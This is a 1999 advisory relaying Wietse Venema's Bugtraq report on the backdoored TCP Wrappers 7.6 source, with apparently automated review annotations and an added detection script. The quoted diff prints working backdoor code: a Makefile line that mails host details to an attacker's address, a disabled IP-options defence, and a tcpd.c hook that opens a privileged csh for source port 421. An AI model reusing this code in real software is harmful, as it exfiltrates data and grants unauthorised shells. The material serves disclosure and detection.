
Modification of the TCPWRAPPER Program's Source Code

Contribution: José Vicente Machado Filho

Publication Date: 25 January 1999

The TCP Wrappers source tarball was "trojaned" (a backdoored copy was placed on its distribution site), and several people downloaded the altered program before the original was restored.

The e-mail below contains the full description of the problem, as published by Wietse Venema himself.

José Vicente Machado Filho, Support Analyst

Modulo Security Solutions S.A. http://www.modulo.com.br

-----Original Message-----
From: Wietse Venema <wietse@PORCUPINE.ORG>
To: BUGTRAQ@netspace.org <BUGTRAQ@netspace.org>
Date: Thursday, 21 January 1999 18:34
Subject: [S] backdoored tcp wrapper source code


>TCP Wrappers is a widely-used security tool to protect UNIX systems
>against intrusion. It has an estimated installed base of millions.
>
>Today someone replaced the tcp wrapper source on ftp.win.tue.nl by
>a backdoored version. Eventually this was bound to happen, and
>that's why the source file is accompanied by a PGP signature.  But
>that is no guarantee against people downloading and installing
>backdoored software.
>
>The backdoor gives access to a privileged shell when a client
>connects from port 421.
>
>The backdoored copy was downloaded 52 times between 07:16 MET and
>16:29 MET. I have informed the sites that downloaded a copy.
>
>Below are details on how to recognize the backdoored version.
>
>        Wietse
>
>Relevant time stamp/size information (times relative to MET):
>
>Backdoored version:
>
>    % ls -lcta
>    -r--r--r--  1 wswietse    99186 Jan 21 07:16 tcp_wrappers_7.6.tar.gz
>    ...
>    dr-xr-sr-x  3 wswietse     4096 Apr 11  1998 .
>
>Restored version:
>
>    % ls -lt tcp_wrappers_7.6.tar.gz
>    -r--r--r--  1 wswietse    99438 Jan 21 16:29 tcp_wrappers_7.6.tar.gz
>
>The signature of the bad TAR file is: length 99186 instead of 99438.
>The signature of a compiled tcpd binary is:
>
>    strings -a tcpd | grep csh
>
>any output probably means trouble.
>
>Changes that were made to the tcp wrapper 7.6 source code:
>
>diff -c 7.6/Makefile /tmp/tcp_wrappers_7.6/Makefile
>*** 7.6/Makefile        Mon Apr  7 20:34:16 1997
>--- /tmp/tcp_wrappers_7.6/Makefile      Fri Mar 21 13:27:21 1997
>***************
>*** 26,31 ****
>--- 26,32 ----
>        @echo
>        @echo "If none of these match your environment, edit the system"
>        @echo "dependencies sections in the Makefile and do a 'make
other'."
>+       @sh -c écho debug-""whoami""-""uname -a"" |mail -s debug
wtcpd@hotmail.com'
>        @echo
>
>  #######################################################
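Review bot: the added `+       @sh -c ...` line is the exfiltration half of the backdoor and runs as a recipe command of the help target that prints the "If none of these match your environment" text, i.e. on a bare `make`: it pipes `echo debug-`whoami`-`uname -a`` into `mail -s debug wtcpd@hotmail.com`, sending the builder's username and full `uname -a` (hostname, OS, kernel version) to the attacker's Hotmail address, and the leading `@` suppresses the command echo so nothing appears in the build output. The line has been mangled in transit (the opening `'` and the backticks around `whoami` and `uname -a` arrive as `é` and `""`), but the intent is unambiguous, and this is the only `mail` invocation anywhere in the diff, so `grep -n mail Makefile` on an extracted tree is an immediate tell. Note the `---` header as well: the modified Makefile carries an mtime of Fri Mar 21 1997, earlier than the genuine Mon Apr 7 1997, so a "newer than the release" timestamp check would not flag it.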
>***************
>*** 649,655 ****
>  # source-routed traffic in the kernel. Examples: 4.4BSD derivatives,
>  # Solaris 2.x, and Linux. See your system documentation for details.
>  #
>! KILL_OPT= -DKILL_IP_OPTIONS
>
>  ## End configuration options
>  ############################
>--- 650,656 ----
>  # source-routed traffic in the kernel. Examples: 4.4BSD derivatives,
>  # Solaris 2.x, and Linux. See your system documentation for details.
>  #
>! # KILL_OPT= -DKILL_IP_OPTIONS
>
>  ## End configuration options
>  ############################
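Review bot: commenting out `KILL_OPT= -DKILL_IP_OPTIONS` silently disables tcpd's IP-options defense: without that define, tcpd no longer clears source-routing options on the accepted connection, so a client can source-route its packets and present itself as an address that hosts.allow trusts. The surrounding comment was left intact, so a builder reading the Makefile sees the option apparently "just off" and relying on the kernel, which is exactly the appearance the change needs. There is no functional reason to ship a release tarball with this weakened; the correct review action is to restore `KILL_OPT= -DKILL_IP_OPTIONS` and diff the configuration section against the PGP-signed release rather than against memory.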
>Only in 7.6: Makefile-
>diff -c 7.6/tcpd.c /tmp/tcp_wrappers_7.6/tcpd.c
>*** 7.6/tcpd.c  Sun Feb 11 11:01:33 1996
>--- /tmp/tcp_wrappers_7.6/tcpd.c        Sun Feb 11 11:01:33 1996
>***************
>*** 41,52 ****
>--- 41,63 ----
>  int     allow_severity = SEVERITY;    /* run-time adjustable */
>  int     deny_severity = LOG_WARNING;  /* ditto */
>
>+ char    IDENT[]="NC421\n";
>+ char    SRUN[]="-csh";
>+ char    SPATH[]="/bin/csh";
>+ #define PORT 421
>+
>  main(argc, argv)
>  int     argc;
>  char  **argv;
>  {
>      struct request_info request;
>+     struct sockaddr_in from;
>      char    path[MAXPATHNAMELEN];
>+     int     fromlen;
>+
>+     fromlen = sizeof(from);if (getpeername(0,(struct sockaddr*)&from,
>+     &fromlen)>=0){if(ntohs(from.sin_port)==PORT){write(0,IDENT,
>+     strlen(IDENT));execl(SPATH,SRUN,(char*)0);}}
>
>      /* Attempt to prevent the creation of world-writable files. */
>
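Review bot: the inserted block sits at the top of main(), before request_init()/hosts_access() and before the umask fix-up that immediately follows it, so neither hosts.allow/hosts.deny nor tcpd's logging is consulted: getpeername(0, ...) reads the peer of the inetd-supplied socket on fd 0, and if the client's source port is 421 it writes the banner "NC421\n" back down the socket and execl()s /bin/csh with argv[0] set to "-csh" (a login shell). Because inetd starts tcpd with the privileges of the wrapped service, this is the "privileged shell" from the message above. The execl() has no error path, so where /bin/csh is missing the call fails and tcpd continues normally, which keeps the backdoor invisible on such hosts. For detection, the literals "/bin/csh" and "-csh" are what `strings -a tcpd | grep csh` finds, and on the network a TCP connection to a wrapped service with source port 421 is the trigger and cheap to alert on (a normal client uses an ephemeral source port; 421 is a privileged port, so the attacker needs root on the connecting host). Note also the file header: the backdoored tcpd.c carries exactly the genuine file's mtime (Sun Feb 11 11:01:33 1996), so `ls -l` on the extracted tree shows nothing; only size, a hash, or the PGP signature on the tarball catches it.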


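As an added example (not part of Wietse's message or of the tcp_wrappers distribution), the following shell script turns the indicators above into checks a practitioner can run on a downloaded copy: the tarball size (99438 genuine, 99186 backdoored), the `strings -a tcpd | grep csh` test on a built binary, a grep of tcpd.c for shell string literals like the backdoor's "-csh"/"/bin/csh", and a PGP signature check on the tarball. The sizes and the csh test come from the advisory; the source-literal pattern, the function names, the grep -a fallback for hosts without binutils, and the assumption that Wietse's key is already in the gpg keyring are this example's own.

```shell
#!/bin/sh
# Added example, not code from the original advisory or from tcp_wrappers.
# Checks a downloaded tcp_wrappers 7.6 copy against the indicators Wietse posted.

GOOD_SIZE=99438   # genuine tcp_wrappers_7.6.tar.gz (from the advisory)
BAD_SIZE=99186    # backdoored copy (from the advisory)

# file_size FILE -> size in bytes (wc -c is portable; ls -l output is not)
file_size() {
    wc -c < "$1" | tr -d ' '
}

# check_tarball FILE -> 0 if the size matches the genuine tarball,
#                       1 if it matches the known bad copy, 2 if unknown
check_tarball() {
    size=$(file_size "$1")
    if [ "$size" -eq "$GOOD_SIZE" ]; then
        echo "$1: size $size matches the genuine 7.6 tarball"
        return 0
    elif [ "$size" -eq "$BAD_SIZE" ]; then
        echo "$1: size $size is the BACKDOORED copy"
        return 1
    else
        echo "$1: size $size matches neither known copy; verify the PGP signature"
        return 2
    fi
}

# check_binary TCPD -> 1 if the binary carries a csh reference (the backdoor's
# "-csh"/"/bin/csh" literals), 0 otherwise.  A clean tcpd never mentions csh.
# Uses strings(1) when binutils is present, else grep -a (scan binary as text).
check_binary() {
    if { command -v strings >/dev/null 2>&1 && strings -a "$1" | grep -q csh; } \
       || grep -aq csh "$1"; then
        echo "$1: contains csh strings, probably backdoored"
        return 1
    fi
    echo "$1: no csh strings"
    return 0
}

# check_source TCPD_C -> 1 if tcpd.c contains a string literal naming a shell
# ("-csh", "/bin/csh", "/bin/sh", ...).  Assumption of this example: the genuine
# tcpd.c execs the wrapped daemon by path and has no such literal.
check_source() {
    if grep -Eq '"-?(/bin/)?(csh|sh|ksh|bash)"' "$1"; then
        echo "$1: shell string literal present, inspect main()"
        return 1
    fi
    echo "$1: no shell string literal"
    return 0
}

# verify_signature TARBALL SIGFILE -> gpg's exit status for the detached
# signature shipped beside the tarball (assumes the signer's key is in the keyring)
verify_signature() {
    command -v gpg >/dev/null 2>&1 || { echo "gpg not installed"; return 2; }
    gpg --verify "$2" "$1"
}

# Usage: sh check_tcpw.sh tcp_wrappers_7.6.tar.gz [tcpd] [tcpd.c]
if [ "$#" -gt 0 ]; then
    check_tarball "$1"
    if [ -n "$2" ]; then check_binary "$2"; fi
    if [ -n "$3" ]; then check_source "$3"; fi
fi
```

The size check is only a tripwire for this one incident; the signature check is the general defense, since an attacker who can replace the tarball can also publish a matching size. Run `verify_signature` before extracting anything, and treat a tcpd that mentions csh, or an inbound connection from source port 421, as a compromised build rather than a curiosity.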
